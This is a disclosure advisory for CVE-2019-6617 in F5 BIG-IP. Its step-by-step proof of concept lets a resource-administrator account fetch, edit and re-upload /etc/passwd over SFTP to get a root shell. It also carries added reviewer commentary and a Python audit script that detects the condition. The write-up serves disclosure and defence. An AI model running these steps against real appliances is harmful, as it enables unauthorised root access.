CVE-2019-6617.txt
Title: F5 BIG-IP Resource Administrator Privilege Escalation
Author: Rich Mirch
CVE: CVE-2019-6617
Vendor Advisory: https://support.f5.com/csp/article/K38941195
Description
An F5 BIG-IP account with the resource administrator role while also having
terminal access disabled still has the ability to access the appliance via
SFTP as root. This PoC will show that a resource administrator can obtain root
access to the appliance and take full control with terminal access disabled.
Technical details
A local account configured with the resource administrator role is created as
a Linux user with uid set to zero/root. SSH is not allowed when terminal
access is disabled. The problem is that the SFTP service is still allowed
without any restrictions. Since a resource administrator account is a Linux
root account, it has the ability to overwrite any file on the system.
Note: The SSH service must be enabled and the management interface accessible.
CVSS
Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
Base: 7.2
Temporal: 6.9
Test Environment
F5 BIG-IP Virtual Edition 14.0.0.1
[root@bigip14:Active:Standalone] ~ # tmsh show sys version
Sys::Version
Main Package
Product BIG-IP
Version 14.0.0.1
Build 0.0.2
Edition Point Release 1
Date Fri Aug 17 16:22:25 PDT 2018
A resource administrator account (resadmin) with the following attributes was used for this PoC.
Note that the shell attribute is set to "none".
[root@bigip14:Active:Standalone] ~ # tmsh list auth user resadmin | grep -v encrypted-password
auth user resadmin {
    description resadmin
    partition Common
    partition-access {
        all-partitions {
            role resource-admin
        }
    }
    shell none
}
Proof Of Concept
[Step 1]
Show that resadmin is not allowed to SSH.
$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:23:23 2018 from 1.2.3.4
This account is currently not available.
Connection to 5.6.7.8 closed.
[Step 2]
Connect to the appliance as resadmin via SFTP and retrieve the /etc/passwd file.
$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> get /etc/passwd
Fetching /etc/passwd to passwd
/etc/passwd 100% 1423 229.8KB/s 00:00
sftp> quit
[Step 3]
Update the local passwd file and change /sbin/nologin to /bin/bash for the resadmin user.
$ perl -p -i.orig -e 's!/sbin/nologin!/bin/bash! if /^resadmin/;' passwd
[Step 4]
Display a diff of the passwd change from step 3.
$ diff -u passwd.orig passwd
--- passwd.orig 2018-09-13 17:32:55.000000000 -0500
+++ passwd 2018-09-13 17:34:36.000000000 -0500
@@ -26,4 +26,4 @@
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
syscheck:x:199:10::/:/sbin/nologin
restnoded:x:198:198::/:/sbin/nologin
-resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin
+resadmin:x:0:500:resadmin:/home/resadmin:/bin/bash
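Review bot: The hunk changes only the seventh (login-shell) field of the resadmin line; the uid field stays 0 and the gid stays 500, which is why the shell obtained in Step 6 reports uid=0(root). The 4-byte size drop between the download in Step 2 (1423 bytes) and the upload in Step 5 (1419 bytes) matches /sbin/nologin (13 characters) being replaced by /bin/bash (9 characters). The point a defender should take from this hunk is that the uid-0 mapping exists before the edit; the shell field is the only thing standing between the account and a root login, and it lives in a file the account itself can overwrite.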
[Step 5]
SFTP as resadmin and upload the modified passwd file to /etc/passwd.
$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> cd /etc
sftp> put passwd
Uploading passwd to /etc/passwd
passwd 100% 1419 541.3KB/s 00:00
sftp> quit
[Step 6]
Log in as resadmin via SSH and obtain a bash shell running as the root user.
$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:30:39 2018 from 1.2.3.4
[resadmin@bigip14:Active:Standalone] ~ # echo $SHELL
/bin/bash
[resadmin@bigip14:Active:Standalone] ~ # id
uid=0(root) gid=500(webusers) groups=500(webusers),495(sdm) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
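The condition described under "Technical details" (a non-root account carrying uid 0) and the change made in Steps 3 to 5 (the shell field flipped in /etc/passwd) are both things an administrator can audit for from a copy of the passwd file. The following is an added example, not part of this advisory; the sample passwd content is constructed from the context lines of the Step 4 diff plus an assumed root entry, and the list of non-login shells is an assumption.

```python
# Audit helper for the condition behind CVE-2019-6617: an account other than root
# that carries uid 0, and whose login shell can be flipped by rewriting /etc/passwd.
# Added example, not part of the advisory; sample content is constructed (see below).
from typing import Dict, List, NamedTuple, Tuple

NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}  # assumption

class PasswdEntry(NamedTuple):
    name: str
    uid: int
    shell: str

def parse_passwd(text: str) -> Dict[str, PasswdEntry]:
    """Parse passwd(5) lines into a name-keyed map; malformed lines are skipped."""
    entries: Dict[str, PasswdEntry] = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # blank, comment, or truncated line: ignore rather than crash
        entries[fields[0]] = PasswdEntry(fields[0], int(fields[2]), fields[6])
    return entries

def uid0_aliases(entries: Dict[str, PasswdEntry]) -> List[str]:
    """Accounts other than 'root' that resolve to uid 0, whatever their shell."""
    return sorted(n for n, e in entries.items() if e.uid == 0 and n != "root")

def uid0_logins(entries: Dict[str, PasswdEntry]) -> List[str]:
    """uid-0 aliases that also carry an interactive shell, i.e. a usable root login."""
    return sorted(n for n in uid0_aliases(entries) if entries[n].shell not in NOLOGIN_SHELLS)

def shell_changes(baseline: Dict[str, PasswdEntry],
                  current: Dict[str, PasswdEntry]) -> Dict[str, Tuple[str, str]]:
    """Shell-field differences between a known-good copy and the live file."""
    return {n: (baseline[n].shell, e.shell) for n, e in current.items()
            if n in baseline and baseline[n].shell != e.shell}

# Constructed sample: the Step 4 context lines plus an assumed root entry, before/after.
BASELINE = """\
root:x:0:0:root:/root:/bin/bash
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
syscheck:x:199:10::/:/sbin/nologin
restnoded:x:198:198::/:/sbin/nologin
resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin
"""
MODIFIED = BASELINE.replace("/home/resadmin:/sbin/nologin", "/home/resadmin:/bin/bash")

if __name__ == "__main__":
    before, after = parse_passwd(BASELINE), parse_passwd(MODIFIED)
    print(uid0_aliases(before), uid0_logins(after), shell_changes(before, after))
```

Run against the unmodified file, uid0_aliases already reports resadmin, which is the underlying condition; uid0_logins and shell_changes only fire once the shell field has been rewritten, as in Step 5.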
Timeline:
2018-09-13: Reported to vendor
2018-09-14: Vendor confirmed vulnerability
2018-09-26: Vendor requested embargo
2018-12-07: Contacted vendor for update
2019-04-30: Vendor released fix and advisory